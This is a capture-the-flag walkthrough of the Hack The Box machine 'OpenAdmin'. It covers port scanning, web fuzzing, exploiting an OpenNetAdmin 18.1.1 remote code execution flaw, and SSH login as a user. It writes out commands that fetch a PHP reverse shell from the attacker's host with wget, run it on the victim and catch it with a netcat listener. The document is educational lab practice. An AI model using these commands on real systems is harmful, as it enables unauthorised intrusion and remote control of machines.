---
title: "OpenAdmin Hackthebox"
date: 2021-07-01T15:24:32+02:00
draft: false
image: "/static/HACKING/openadmin-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/openadmin-index.jpg)

# [+] BOX INFO 💻 :

```
Operative System : Linux 🐧
Difficulty : Medium 🌓
Owner : del_KZx497Ju
IP : 10.10.10.171
```
# [+] PART 1 - GAIN ACCESS

The first step is scanning machine's ports with nmap:

> [nmap -p- --open -T5 -n 10.10.10.171](https://explainshell.com/explain?cmd=nmap+-p-+--open+-T5+-n+10.10.10.171)

```
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Once seen open ports, let's get a deeper scan :

> [nmap -p22,80 -sV -sC -sS 10.10.10.171](https://explainshell.com/explain?cmd=nmap+-p22%2C80+-sV+-sC+-sS+10.10.10.171)

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Here we can point out the http server, let's check it:

![<- Not working](/static/HACKING/openadmin-1.png)

Now, let's fuzz the website, in my case I'll be using [dirsearch](https://github.com/maurosoria/dirsearch)

> python3 dirsearch.py -u http://10.10.10.171/ -e "*" 

```

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, jsf, asp, aspx, do, action, cgi, pl, html, htm, js, json, json, tar.gz, tgz | HTTP method: GET | Threads: 30 | Wordlist size: 15897

Output File: /opt/dirsearch/reports/10.10.10.171/_21-07-01_19-48-53.txt

Error Log: /opt/dirsearch/logs/errors-21-07-01_19-48-53.log

Target: http://10.10.10.171/

[19:48:53] Starting:  
[19:49:13] 200 -   11KB - /index.html                                                                                         
[19:49:16] 301 -  312B  - /music  ->  http://10.10.10.171/music/                                                                 
[19:49:16] 301 -  310B  - /ona  ->  http://10.10.10.171/ona/                               
                                                                                                                        
Task Completed   
```

Let's check `music` and `ona`:

![<- Not working](/static/HACKING/openadmin-2.png)

After a while enumerating this I didn't find anything. So let's proceed to try luck with `ona` :

![<- Not working](/static/HACKING/openadmin-3.png)

Let's try to figure out what's the service running there:

![<- Not working](/static/HACKING/openadmin-4.png)

So, the service is OpenNetAdmin and the version is 18.1.1 , and after a quick google search I found this [exploit](https://github.com/amriunix/ona-rce)

![<- Not working](/static/HACKING/openadmin-5.png) 

We got a shell as www-data! However our shell is kinda useless, so let's get a [php reverse shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php):

### From our local machine : 

> [python3 -m http.server](https://explainshell.com/explain?cmd=python3+-m+http.server)

> [rlwrap nc -klvnp 8989](https://explainshell.com/explain?cmd=rlwrap+nc+-klvnp+8989)

### From the victim machine : 

> [wget 10.10.14.18/php-reverse-shell.php](https://explainshell.com/explain?cmd=wget+10.10.14.18%2Fphp-reverse-shell.php)

> [php php-reverse-shell.php](https://explainshell.com/explain?cmd=php+php-reverse-shell.php)

![<- Not working](/static/HACKING/openadmin-6.png) 

Now, to get a better shell we can run this:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
stty rows 59 columns 235
```

# [+] PART 2 - PRIVESC

Now we have to run [linpeas.sh](https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh) to enumerate the system :

![<- Not working](/static/HACKING/openadmin-7.png)

Unfortunately I couldn't extract any useful information so I had to enumerate manually until I found this:

![<- Not working](/static/HACKING/openadmin-8.png)

Looking at the /home directory we can find 2 users -> `jimmy` and `joanna`. Let's try to login through ssh with jimmy :

![<- Not working](/static/HACKING/openadmin-9.png)

Nice! It worked.



 

